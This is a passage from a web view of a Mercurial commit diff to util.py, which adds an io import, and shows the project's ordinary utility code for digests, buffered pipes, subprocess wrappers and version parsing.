##// END OF EJS Templates
util: handle fileno() on Python 3 throwing io.UnsupportedOperation...
Augie Fackler -
r36450:1ca4e86c default
parent child Browse files
Show More
@@ -1,4009 +1,4013 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import io
29 import itertools
30 import itertools
30 import mmap
31 import mmap
31 import os
32 import os
32 import platform as pyplatform
33 import platform as pyplatform
33 import re as remod
34 import re as remod
34 import shutil
35 import shutil
35 import signal
36 import signal
36 import socket
37 import socket
37 import stat
38 import stat
38 import string
39 import string
39 import subprocess
40 import subprocess
40 import sys
41 import sys
41 import tempfile
42 import tempfile
42 import textwrap
43 import textwrap
43 import time
44 import time
44 import traceback
45 import traceback
45 import warnings
46 import warnings
46 import zlib
47 import zlib
47
48
48 from . import (
49 from . import (
49 encoding,
50 encoding,
50 error,
51 error,
51 i18n,
52 i18n,
52 node as nodemod,
53 node as nodemod,
53 policy,
54 policy,
54 pycompat,
55 pycompat,
55 urllibcompat,
56 urllibcompat,
56 )
57 )
57
58
58 base85 = policy.importmod(r'base85')
59 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
60 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
61 parsers = policy.importmod(r'parsers')
61
62
62 b85decode = base85.b85decode
63 b85decode = base85.b85decode
63 b85encode = base85.b85encode
64 b85encode = base85.b85encode
64
65
65 cookielib = pycompat.cookielib
66 cookielib = pycompat.cookielib
66 empty = pycompat.empty
67 empty = pycompat.empty
67 httplib = pycompat.httplib
68 httplib = pycompat.httplib
68 pickle = pycompat.pickle
69 pickle = pycompat.pickle
69 queue = pycompat.queue
70 queue = pycompat.queue
70 socketserver = pycompat.socketserver
71 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
72 stderr = pycompat.stderr
72 stdin = pycompat.stdin
73 stdin = pycompat.stdin
73 stdout = pycompat.stdout
74 stdout = pycompat.stdout
74 stringio = pycompat.stringio
75 stringio = pycompat.stringio
75 xmlrpclib = pycompat.xmlrpclib
76 xmlrpclib = pycompat.xmlrpclib
76
77
77 httpserver = urllibcompat.httpserver
78 httpserver = urllibcompat.httpserver
78 urlerr = urllibcompat.urlerr
79 urlerr = urllibcompat.urlerr
79 urlreq = urllibcompat.urlreq
80 urlreq = urllibcompat.urlreq
80
81
81 # workaround for win32mbcs
82 # workaround for win32mbcs
82 _filenamebytestr = pycompat.bytestr
83 _filenamebytestr = pycompat.bytestr
83
84
84 def isatty(fp):
85 def isatty(fp):
85 try:
86 try:
86 return fp.isatty()
87 return fp.isatty()
87 except AttributeError:
88 except AttributeError:
88 return False
89 return False
89
90
90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 # glibc determines buffering on first write to stdout - if we replace a TTY
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 # buffering
93 # buffering
93 if isatty(stdout):
94 if isatty(stdout):
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95
96
96 if pycompat.iswindows:
97 if pycompat.iswindows:
97 from . import windows as platform
98 from . import windows as platform
98 stdout = platform.winstdout(stdout)
99 stdout = platform.winstdout(stdout)
99 else:
100 else:
100 from . import posix as platform
101 from . import posix as platform
101
102
102 _ = i18n._
103 _ = i18n._
103
104
104 bindunixsocket = platform.bindunixsocket
105 bindunixsocket = platform.bindunixsocket
105 cachestat = platform.cachestat
106 cachestat = platform.cachestat
106 checkexec = platform.checkexec
107 checkexec = platform.checkexec
107 checklink = platform.checklink
108 checklink = platform.checklink
108 copymode = platform.copymode
109 copymode = platform.copymode
109 executablepath = platform.executablepath
110 executablepath = platform.executablepath
110 expandglobs = platform.expandglobs
111 expandglobs = platform.expandglobs
111 explainexit = platform.explainexit
112 explainexit = platform.explainexit
112 findexe = platform.findexe
113 findexe = platform.findexe
113 getfsmountpoint = platform.getfsmountpoint
114 getfsmountpoint = platform.getfsmountpoint
114 getfstype = platform.getfstype
115 getfstype = platform.getfstype
115 gethgcmd = platform.gethgcmd
116 gethgcmd = platform.gethgcmd
116 getuser = platform.getuser
117 getuser = platform.getuser
117 getpid = os.getpid
118 getpid = os.getpid
118 groupmembers = platform.groupmembers
119 groupmembers = platform.groupmembers
119 groupname = platform.groupname
120 groupname = platform.groupname
120 hidewindow = platform.hidewindow
121 hidewindow = platform.hidewindow
121 isexec = platform.isexec
122 isexec = platform.isexec
122 isowner = platform.isowner
123 isowner = platform.isowner
123 listdir = osutil.listdir
124 listdir = osutil.listdir
124 localpath = platform.localpath
125 localpath = platform.localpath
125 lookupreg = platform.lookupreg
126 lookupreg = platform.lookupreg
126 makedir = platform.makedir
127 makedir = platform.makedir
127 nlinks = platform.nlinks
128 nlinks = platform.nlinks
128 normpath = platform.normpath
129 normpath = platform.normpath
129 normcase = platform.normcase
130 normcase = platform.normcase
130 normcasespec = platform.normcasespec
131 normcasespec = platform.normcasespec
131 normcasefallback = platform.normcasefallback
132 normcasefallback = platform.normcasefallback
132 openhardlinks = platform.openhardlinks
133 openhardlinks = platform.openhardlinks
133 oslink = platform.oslink
134 oslink = platform.oslink
134 parsepatchoutput = platform.parsepatchoutput
135 parsepatchoutput = platform.parsepatchoutput
135 pconvert = platform.pconvert
136 pconvert = platform.pconvert
136 poll = platform.poll
137 poll = platform.poll
137 popen = platform.popen
138 popen = platform.popen
138 posixfile = platform.posixfile
139 posixfile = platform.posixfile
139 quotecommand = platform.quotecommand
140 quotecommand = platform.quotecommand
140 readpipe = platform.readpipe
141 readpipe = platform.readpipe
141 rename = platform.rename
142 rename = platform.rename
142 removedirs = platform.removedirs
143 removedirs = platform.removedirs
143 samedevice = platform.samedevice
144 samedevice = platform.samedevice
144 samefile = platform.samefile
145 samefile = platform.samefile
145 samestat = platform.samestat
146 samestat = platform.samestat
146 setbinary = platform.setbinary
147 setbinary = platform.setbinary
147 setflags = platform.setflags
148 setflags = platform.setflags
148 setsignalhandler = platform.setsignalhandler
149 setsignalhandler = platform.setsignalhandler
149 shellquote = platform.shellquote
150 shellquote = platform.shellquote
150 shellsplit = platform.shellsplit
151 shellsplit = platform.shellsplit
151 spawndetached = platform.spawndetached
152 spawndetached = platform.spawndetached
152 split = platform.split
153 split = platform.split
153 sshargs = platform.sshargs
154 sshargs = platform.sshargs
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statisexec = platform.statisexec
156 statisexec = platform.statisexec
156 statislink = platform.statislink
157 statislink = platform.statislink
157 testpid = platform.testpid
158 testpid = platform.testpid
158 umask = platform.umask
159 umask = platform.umask
159 unlink = platform.unlink
160 unlink = platform.unlink
160 username = platform.username
161 username = platform.username
161
162
162 try:
163 try:
163 recvfds = osutil.recvfds
164 recvfds = osutil.recvfds
164 except AttributeError:
165 except AttributeError:
165 pass
166 pass
166 try:
167 try:
167 setprocname = osutil.setprocname
168 setprocname = osutil.setprocname
168 except AttributeError:
169 except AttributeError:
169 pass
170 pass
170 try:
171 try:
171 unblocksignal = osutil.unblocksignal
172 unblocksignal = osutil.unblocksignal
172 except AttributeError:
173 except AttributeError:
173 pass
174 pass
174
175
175 # Python compatibility
176 # Python compatibility
176
177
177 _notset = object()
178 _notset = object()
178
179
179 # disable Python's problematic floating point timestamps (issue4836)
180 # disable Python's problematic floating point timestamps (issue4836)
180 # (Python hypocritically says you shouldn't change this behavior in
181 # (Python hypocritically says you shouldn't change this behavior in
181 # libraries, and sure enough Mercurial is not a library.)
182 # libraries, and sure enough Mercurial is not a library.)
182 os.stat_float_times(False)
183 os.stat_float_times(False)
183
184
184 def safehasattr(thing, attr):
185 def safehasattr(thing, attr):
185 return getattr(thing, attr, _notset) is not _notset
186 return getattr(thing, attr, _notset) is not _notset
186
187
187 def _rapply(f, xs):
188 def _rapply(f, xs):
188 if xs is None:
189 if xs is None:
189 # assume None means non-value of optional data
190 # assume None means non-value of optional data
190 return xs
191 return xs
191 if isinstance(xs, (list, set, tuple)):
192 if isinstance(xs, (list, set, tuple)):
192 return type(xs)(_rapply(f, x) for x in xs)
193 return type(xs)(_rapply(f, x) for x in xs)
193 if isinstance(xs, dict):
194 if isinstance(xs, dict):
194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 return f(xs)
196 return f(xs)
196
197
197 def rapply(f, xs):
198 def rapply(f, xs):
198 """Apply function recursively to every item preserving the data structure
199 """Apply function recursively to every item preserving the data structure
199
200
200 >>> def f(x):
201 >>> def f(x):
201 ... return 'f(%s)' % x
202 ... return 'f(%s)' % x
202 >>> rapply(f, None) is None
203 >>> rapply(f, None) is None
203 True
204 True
204 >>> rapply(f, 'a')
205 >>> rapply(f, 'a')
205 'f(a)'
206 'f(a)'
206 >>> rapply(f, {'a'}) == {'f(a)'}
207 >>> rapply(f, {'a'}) == {'f(a)'}
207 True
208 True
208 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
209 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
209 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
210 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
210
211
211 >>> xs = [object()]
212 >>> xs = [object()]
212 >>> rapply(pycompat.identity, xs) is xs
213 >>> rapply(pycompat.identity, xs) is xs
213 True
214 True
214 """
215 """
215 if f is pycompat.identity:
216 if f is pycompat.identity:
216 # fast path mainly for py2
217 # fast path mainly for py2
217 return xs
218 return xs
218 return _rapply(f, xs)
219 return _rapply(f, xs)
219
220
220 def bytesinput(fin, fout, *args, **kwargs):
221 def bytesinput(fin, fout, *args, **kwargs):
221 sin, sout = sys.stdin, sys.stdout
222 sin, sout = sys.stdin, sys.stdout
222 try:
223 try:
223 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
224 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
224 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
225 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
225 finally:
226 finally:
226 sys.stdin, sys.stdout = sin, sout
227 sys.stdin, sys.stdout = sin, sout
227
228
228 def bitsfrom(container):
229 def bitsfrom(container):
229 bits = 0
230 bits = 0
230 for bit in container:
231 for bit in container:
231 bits |= bit
232 bits |= bit
232 return bits
233 return bits
233
234
234 # python 2.6 still have deprecation warning enabled by default. We do not want
235 # python 2.6 still have deprecation warning enabled by default. We do not want
235 # to display anything to standard user so detect if we are running test and
236 # to display anything to standard user so detect if we are running test and
236 # only use python deprecation warning in this case.
237 # only use python deprecation warning in this case.
237 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
238 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
238 if _dowarn:
239 if _dowarn:
239 # explicitly unfilter our warning for python 2.7
240 # explicitly unfilter our warning for python 2.7
240 #
241 #
241 # The option of setting PYTHONWARNINGS in the test runner was investigated.
242 # The option of setting PYTHONWARNINGS in the test runner was investigated.
242 # However, module name set through PYTHONWARNINGS was exactly matched, so
243 # However, module name set through PYTHONWARNINGS was exactly matched, so
243 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
244 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
244 # makes the whole PYTHONWARNINGS thing useless for our usecase.
245 # makes the whole PYTHONWARNINGS thing useless for our usecase.
245 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
248 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
248
249
249 def nouideprecwarn(msg, version, stacklevel=1):
250 def nouideprecwarn(msg, version, stacklevel=1):
250 """Issue an python native deprecation warning
251 """Issue an python native deprecation warning
251
252
252 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
253 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
253 """
254 """
254 if _dowarn:
255 if _dowarn:
255 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
256 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
256 " update your code.)") % version
257 " update your code.)") % version
257 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
258 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
258
259
259 DIGESTS = {
260 DIGESTS = {
260 'md5': hashlib.md5,
261 'md5': hashlib.md5,
261 'sha1': hashlib.sha1,
262 'sha1': hashlib.sha1,
262 'sha512': hashlib.sha512,
263 'sha512': hashlib.sha512,
263 }
264 }
264 # List of digest types from strongest to weakest
265 # List of digest types from strongest to weakest
265 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
266 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
266
267
267 for k in DIGESTS_BY_STRENGTH:
268 for k in DIGESTS_BY_STRENGTH:
268 assert k in DIGESTS
269 assert k in DIGESTS
269
270
270 class digester(object):
271 class digester(object):
271 """helper to compute digests.
272 """helper to compute digests.
272
273
273 This helper can be used to compute one or more digests given their name.
274 This helper can be used to compute one or more digests given their name.
274
275
275 >>> d = digester([b'md5', b'sha1'])
276 >>> d = digester([b'md5', b'sha1'])
276 >>> d.update(b'foo')
277 >>> d.update(b'foo')
277 >>> [k for k in sorted(d)]
278 >>> [k for k in sorted(d)]
278 ['md5', 'sha1']
279 ['md5', 'sha1']
279 >>> d[b'md5']
280 >>> d[b'md5']
280 'acbd18db4cc2f85cedef654fccc4a4d8'
281 'acbd18db4cc2f85cedef654fccc4a4d8'
281 >>> d[b'sha1']
282 >>> d[b'sha1']
282 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
283 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
283 >>> digester.preferred([b'md5', b'sha1'])
284 >>> digester.preferred([b'md5', b'sha1'])
284 'sha1'
285 'sha1'
285 """
286 """
286
287
287 def __init__(self, digests, s=''):
288 def __init__(self, digests, s=''):
288 self._hashes = {}
289 self._hashes = {}
289 for k in digests:
290 for k in digests:
290 if k not in DIGESTS:
291 if k not in DIGESTS:
291 raise Abort(_('unknown digest type: %s') % k)
292 raise Abort(_('unknown digest type: %s') % k)
292 self._hashes[k] = DIGESTS[k]()
293 self._hashes[k] = DIGESTS[k]()
293 if s:
294 if s:
294 self.update(s)
295 self.update(s)
295
296
296 def update(self, data):
297 def update(self, data):
297 for h in self._hashes.values():
298 for h in self._hashes.values():
298 h.update(data)
299 h.update(data)
299
300
300 def __getitem__(self, key):
301 def __getitem__(self, key):
301 if key not in DIGESTS:
302 if key not in DIGESTS:
302 raise Abort(_('unknown digest type: %s') % k)
303 raise Abort(_('unknown digest type: %s') % k)
303 return nodemod.hex(self._hashes[key].digest())
304 return nodemod.hex(self._hashes[key].digest())
304
305
305 def __iter__(self):
306 def __iter__(self):
306 return iter(self._hashes)
307 return iter(self._hashes)
307
308
308 @staticmethod
309 @staticmethod
309 def preferred(supported):
310 def preferred(supported):
310 """returns the strongest digest type in both supported and DIGESTS."""
311 """returns the strongest digest type in both supported and DIGESTS."""
311
312
312 for k in DIGESTS_BY_STRENGTH:
313 for k in DIGESTS_BY_STRENGTH:
313 if k in supported:
314 if k in supported:
314 return k
315 return k
315 return None
316 return None
316
317
317 class digestchecker(object):
318 class digestchecker(object):
318 """file handle wrapper that additionally checks content against a given
319 """file handle wrapper that additionally checks content against a given
319 size and digests.
320 size and digests.
320
321
321 d = digestchecker(fh, size, {'md5': '...'})
322 d = digestchecker(fh, size, {'md5': '...'})
322
323
323 When multiple digests are given, all of them are validated.
324 When multiple digests are given, all of them are validated.
324 """
325 """
325
326
326 def __init__(self, fh, size, digests):
327 def __init__(self, fh, size, digests):
327 self._fh = fh
328 self._fh = fh
328 self._size = size
329 self._size = size
329 self._got = 0
330 self._got = 0
330 self._digests = dict(digests)
331 self._digests = dict(digests)
331 self._digester = digester(self._digests.keys())
332 self._digester = digester(self._digests.keys())
332
333
333 def read(self, length=-1):
334 def read(self, length=-1):
334 content = self._fh.read(length)
335 content = self._fh.read(length)
335 self._digester.update(content)
336 self._digester.update(content)
336 self._got += len(content)
337 self._got += len(content)
337 return content
338 return content
338
339
339 def validate(self):
340 def validate(self):
340 if self._size != self._got:
341 if self._size != self._got:
341 raise Abort(_('size mismatch: expected %d, got %d') %
342 raise Abort(_('size mismatch: expected %d, got %d') %
342 (self._size, self._got))
343 (self._size, self._got))
343 for k, v in self._digests.items():
344 for k, v in self._digests.items():
344 if v != self._digester[k]:
345 if v != self._digester[k]:
345 # i18n: first parameter is a digest name
346 # i18n: first parameter is a digest name
346 raise Abort(_('%s mismatch: expected %s, got %s') %
347 raise Abort(_('%s mismatch: expected %s, got %s') %
347 (k, v, self._digester[k]))
348 (k, v, self._digester[k]))
348
349
349 try:
350 try:
350 buffer = buffer
351 buffer = buffer
351 except NameError:
352 except NameError:
352 def buffer(sliceable, offset=0, length=None):
353 def buffer(sliceable, offset=0, length=None):
353 if length is not None:
354 if length is not None:
354 return memoryview(sliceable)[offset:offset + length]
355 return memoryview(sliceable)[offset:offset + length]
355 return memoryview(sliceable)[offset:]
356 return memoryview(sliceable)[offset:]
356
357
357 closefds = pycompat.isposix
358 closefds = pycompat.isposix
358
359
359 _chunksize = 4096
360 _chunksize = 4096
360
361
361 class bufferedinputpipe(object):
362 class bufferedinputpipe(object):
362 """a manually buffered input pipe
363 """a manually buffered input pipe
363
364
364 Python will not let us use buffered IO and lazy reading with 'polling' at
365 Python will not let us use buffered IO and lazy reading with 'polling' at
365 the same time. We cannot probe the buffer state and select will not detect
366 the same time. We cannot probe the buffer state and select will not detect
366 that data are ready to read if they are already buffered.
367 that data are ready to read if they are already buffered.
367
368
368 This class let us work around that by implementing its own buffering
369 This class let us work around that by implementing its own buffering
369 (allowing efficient readline) while offering a way to know if the buffer is
370 (allowing efficient readline) while offering a way to know if the buffer is
370 empty from the output (allowing collaboration of the buffer with polling).
371 empty from the output (allowing collaboration of the buffer with polling).
371
372
372 This class lives in the 'util' module because it makes use of the 'os'
373 This class lives in the 'util' module because it makes use of the 'os'
373 module from the python stdlib.
374 module from the python stdlib.
374 """
375 """
375
376
376 def __init__(self, input):
377 def __init__(self, input):
377 self._input = input
378 self._input = input
378 self._buffer = []
379 self._buffer = []
379 self._eof = False
380 self._eof = False
380 self._lenbuf = 0
381 self._lenbuf = 0
381
382
382 @property
383 @property
383 def hasbuffer(self):
384 def hasbuffer(self):
384 """True is any data is currently buffered
385 """True is any data is currently buffered
385
386
386 This will be used externally a pre-step for polling IO. If there is
387 This will be used externally a pre-step for polling IO. If there is
387 already data then no polling should be set in place."""
388 already data then no polling should be set in place."""
388 return bool(self._buffer)
389 return bool(self._buffer)
389
390
390 @property
391 @property
391 def closed(self):
392 def closed(self):
392 return self._input.closed
393 return self._input.closed
393
394
394 def fileno(self):
395 def fileno(self):
395 return self._input.fileno()
396 return self._input.fileno()
396
397
397 def close(self):
398 def close(self):
398 return self._input.close()
399 return self._input.close()
399
400
400 def read(self, size):
401 def read(self, size):
401 while (not self._eof) and (self._lenbuf < size):
402 while (not self._eof) and (self._lenbuf < size):
402 self._fillbuffer()
403 self._fillbuffer()
403 return self._frombuffer(size)
404 return self._frombuffer(size)
404
405
405 def readline(self, *args, **kwargs):
406 def readline(self, *args, **kwargs):
406 if 1 < len(self._buffer):
407 if 1 < len(self._buffer):
407 # this should not happen because both read and readline end with a
408 # this should not happen because both read and readline end with a
408 # _frombuffer call that collapse it.
409 # _frombuffer call that collapse it.
409 self._buffer = [''.join(self._buffer)]
410 self._buffer = [''.join(self._buffer)]
410 self._lenbuf = len(self._buffer[0])
411 self._lenbuf = len(self._buffer[0])
411 lfi = -1
412 lfi = -1
412 if self._buffer:
413 if self._buffer:
413 lfi = self._buffer[-1].find('\n')
414 lfi = self._buffer[-1].find('\n')
414 while (not self._eof) and lfi < 0:
415 while (not self._eof) and lfi < 0:
415 self._fillbuffer()
416 self._fillbuffer()
416 if self._buffer:
417 if self._buffer:
417 lfi = self._buffer[-1].find('\n')
418 lfi = self._buffer[-1].find('\n')
418 size = lfi + 1
419 size = lfi + 1
419 if lfi < 0: # end of file
420 if lfi < 0: # end of file
420 size = self._lenbuf
421 size = self._lenbuf
421 elif 1 < len(self._buffer):
422 elif 1 < len(self._buffer):
422 # we need to take previous chunks into account
423 # we need to take previous chunks into account
423 size += self._lenbuf - len(self._buffer[-1])
424 size += self._lenbuf - len(self._buffer[-1])
424 return self._frombuffer(size)
425 return self._frombuffer(size)
425
426
426 def _frombuffer(self, size):
427 def _frombuffer(self, size):
427 """return at most 'size' data from the buffer
428 """return at most 'size' data from the buffer
428
429
429 The data are removed from the buffer."""
430 The data are removed from the buffer."""
430 if size == 0 or not self._buffer:
431 if size == 0 or not self._buffer:
431 return ''
432 return ''
432 buf = self._buffer[0]
433 buf = self._buffer[0]
433 if 1 < len(self._buffer):
434 if 1 < len(self._buffer):
434 buf = ''.join(self._buffer)
435 buf = ''.join(self._buffer)
435
436
436 data = buf[:size]
437 data = buf[:size]
437 buf = buf[len(data):]
438 buf = buf[len(data):]
438 if buf:
439 if buf:
439 self._buffer = [buf]
440 self._buffer = [buf]
440 self._lenbuf = len(buf)
441 self._lenbuf = len(buf)
441 else:
442 else:
442 self._buffer = []
443 self._buffer = []
443 self._lenbuf = 0
444 self._lenbuf = 0
444 return data
445 return data
445
446
446 def _fillbuffer(self):
447 def _fillbuffer(self):
447 """read data to the buffer"""
448 """read data to the buffer"""
448 data = os.read(self._input.fileno(), _chunksize)
449 data = os.read(self._input.fileno(), _chunksize)
449 if not data:
450 if not data:
450 self._eof = True
451 self._eof = True
451 else:
452 else:
452 self._lenbuf += len(data)
453 self._lenbuf += len(data)
453 self._buffer.append(data)
454 self._buffer.append(data)
454
455
455 def mmapread(fp):
456 def mmapread(fp):
456 try:
457 try:
457 fd = getattr(fp, 'fileno', lambda: fp)()
458 fd = getattr(fp, 'fileno', lambda: fp)()
458 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
459 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
459 except ValueError:
460 except ValueError:
460 # Empty files cannot be mmapped, but mmapread should still work. Check
461 # Empty files cannot be mmapped, but mmapread should still work. Check
461 # if the file is empty, and if so, return an empty buffer.
462 # if the file is empty, and if so, return an empty buffer.
462 if os.fstat(fd).st_size == 0:
463 if os.fstat(fd).st_size == 0:
463 return ''
464 return ''
464 raise
465 raise
465
466
466 def popen2(cmd, env=None, newlines=False):
467 def popen2(cmd, env=None, newlines=False):
467 # Setting bufsize to -1 lets the system decide the buffer size.
468 # Setting bufsize to -1 lets the system decide the buffer size.
468 # The default for bufsize is 0, meaning unbuffered. This leads to
469 # The default for bufsize is 0, meaning unbuffered. This leads to
469 # poor performance on Mac OS X: http://bugs.python.org/issue4194
470 # poor performance on Mac OS X: http://bugs.python.org/issue4194
470 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
471 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
471 close_fds=closefds,
472 close_fds=closefds,
472 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
473 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
473 universal_newlines=newlines,
474 universal_newlines=newlines,
474 env=env)
475 env=env)
475 return p.stdin, p.stdout
476 return p.stdin, p.stdout
476
477
477 def popen3(cmd, env=None, newlines=False):
478 def popen3(cmd, env=None, newlines=False):
478 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
479 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
479 return stdin, stdout, stderr
480 return stdin, stdout, stderr
480
481
481 def popen4(cmd, env=None, newlines=False, bufsize=-1):
482 def popen4(cmd, env=None, newlines=False, bufsize=-1):
482 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
483 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
483 close_fds=closefds,
484 close_fds=closefds,
484 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
485 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
485 stderr=subprocess.PIPE,
486 stderr=subprocess.PIPE,
486 universal_newlines=newlines,
487 universal_newlines=newlines,
487 env=env)
488 env=env)
488 return p.stdin, p.stdout, p.stderr, p
489 return p.stdin, p.stdout, p.stderr, p
489
490
490 def version():
491 def version():
491 """Return version information if available."""
492 """Return version information if available."""
492 try:
493 try:
493 from . import __version__
494 from . import __version__
494 return __version__.version
495 return __version__.version
495 except ImportError:
496 except ImportError:
496 return 'unknown'
497 return 'unknown'
497
498
498 def versiontuple(v=None, n=4):
499 def versiontuple(v=None, n=4):
499 """Parses a Mercurial version string into an N-tuple.
500 """Parses a Mercurial version string into an N-tuple.
500
501
501 The version string to be parsed is specified with the ``v`` argument.
502 The version string to be parsed is specified with the ``v`` argument.
502 If it isn't defined, the current Mercurial version string will be parsed.
503 If it isn't defined, the current Mercurial version string will be parsed.
503
504
504 ``n`` can be 2, 3, or 4. Here is how some version strings map to
505 ``n`` can be 2, 3, or 4. Here is how some version strings map to
505 returned values:
506 returned values:
506
507
507 >>> v = b'3.6.1+190-df9b73d2d444'
508 >>> v = b'3.6.1+190-df9b73d2d444'
508 >>> versiontuple(v, 2)
509 >>> versiontuple(v, 2)
509 (3, 6)
510 (3, 6)
510 >>> versiontuple(v, 3)
511 >>> versiontuple(v, 3)
511 (3, 6, 1)
512 (3, 6, 1)
512 >>> versiontuple(v, 4)
513 >>> versiontuple(v, 4)
513 (3, 6, 1, '190-df9b73d2d444')
514 (3, 6, 1, '190-df9b73d2d444')
514
515
515 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
516 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
516 (3, 6, 1, '190-df9b73d2d444+20151118')
517 (3, 6, 1, '190-df9b73d2d444+20151118')
517
518
518 >>> v = b'3.6'
519 >>> v = b'3.6'
519 >>> versiontuple(v, 2)
520 >>> versiontuple(v, 2)
520 (3, 6)
521 (3, 6)
521 >>> versiontuple(v, 3)
522 >>> versiontuple(v, 3)
522 (3, 6, None)
523 (3, 6, None)
523 >>> versiontuple(v, 4)
524 >>> versiontuple(v, 4)
524 (3, 6, None, None)
525 (3, 6, None, None)
525
526
526 >>> v = b'3.9-rc'
527 >>> v = b'3.9-rc'
527 >>> versiontuple(v, 2)
528 >>> versiontuple(v, 2)
528 (3, 9)
529 (3, 9)
529 >>> versiontuple(v, 3)
530 >>> versiontuple(v, 3)
530 (3, 9, None)
531 (3, 9, None)
531 >>> versiontuple(v, 4)
532 >>> versiontuple(v, 4)
532 (3, 9, None, 'rc')
533 (3, 9, None, 'rc')
533
534
534 >>> v = b'3.9-rc+2-02a8fea4289b'
535 >>> v = b'3.9-rc+2-02a8fea4289b'
535 >>> versiontuple(v, 2)
536 >>> versiontuple(v, 2)
536 (3, 9)
537 (3, 9)
537 >>> versiontuple(v, 3)
538 >>> versiontuple(v, 3)
538 (3, 9, None)
539 (3, 9, None)
539 >>> versiontuple(v, 4)
540 >>> versiontuple(v, 4)
540 (3, 9, None, 'rc+2-02a8fea4289b')
541 (3, 9, None, 'rc+2-02a8fea4289b')
541 """
542 """
542 if not v:
543 if not v:
543 v = version()
544 v = version()
544 parts = remod.split('[\+-]', v, 1)
545 parts = remod.split('[\+-]', v, 1)
545 if len(parts) == 1:
546 if len(parts) == 1:
546 vparts, extra = parts[0], None
547 vparts, extra = parts[0], None
547 else:
548 else:
548 vparts, extra = parts
549 vparts, extra = parts
549
550
550 vints = []
551 vints = []
551 for i in vparts.split('.'):
552 for i in vparts.split('.'):
552 try:
553 try:
553 vints.append(int(i))
554 vints.append(int(i))
554 except ValueError:
555 except ValueError:
555 break
556 break
556 # (3, 6) -> (3, 6, None)
557 # (3, 6) -> (3, 6, None)
557 while len(vints) < 3:
558 while len(vints) < 3:
558 vints.append(None)
559 vints.append(None)
559
560
560 if n == 2:
561 if n == 2:
561 return (vints[0], vints[1])
562 return (vints[0], vints[1])
562 if n == 3:
563 if n == 3:
563 return (vints[0], vints[1], vints[2])
